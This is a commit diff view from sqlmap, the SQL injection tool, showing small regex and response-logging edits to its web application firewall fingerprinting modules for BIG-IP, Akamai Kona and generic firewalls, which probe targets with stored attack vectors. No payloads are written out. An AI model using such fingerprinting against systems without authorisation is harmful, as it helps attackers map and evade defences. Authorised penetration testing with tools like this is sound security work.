txt/smalldict.txt
View File

File diff suppressed because it is too large Load Diff

BIN
txt/wordlist.zip
View File

Binary file not shown.

2
waf/bigip.py
View File

@@ -18,7 +18,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS:
_, headers, _ = get_page(get=vector)
retval = headers.get("X-Cnection", "").lower() == "close"
retval |= re.search(r"\ATS[a-zA-Z0-9]{4,}=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval |= re.search(r"\ATS\w{4,}=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
retval |= re.search(r"\AF5\Z", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None

4
waf/generic.py
View File

@@ -5,6 +5,7 @@ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.option import kb
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
from lib.core.settings import WAF_ATTACK_VECTORS
@@ -13,7 +14,7 @@ __product__ = "Generic (Unknown)"
def detect(get_page):
retval = False
page, _, code = get_page()
page, headers, code = get_page()
if page is None or code >= 400:
return False
@@ -21,6 +22,7 @@ def detect(get_page):
page, _, code = get_page(get=vector)
if code >= 400 or IDS_WAF_CHECK_PAYLOAD in vector and code is None:
kb.wafSpecificResponse = "HTTP/1.1 %s\n%s\n%s" % (code, "".join(_ for _ in headers.headers or [] if not _.startswith("URI")), page)
retval = True
break

2
waf/kona.py
View File

@@ -17,7 +17,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS:
page, headers, code = get_page(get=vector)
retval = code in (400, 403, 501) and re.search(r"Reference #[0-9A-Fa-f.]+", page or "", re.I) is not None
retval = code in (400, 403, 501) and re.search(r"Reference #[0-9a-f.]+", page or "", re.I) is not None
retval |= re.search(r"AkamaiGHost", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
if retval:
break

Some files were not shown because too many files have changed in this diff Show More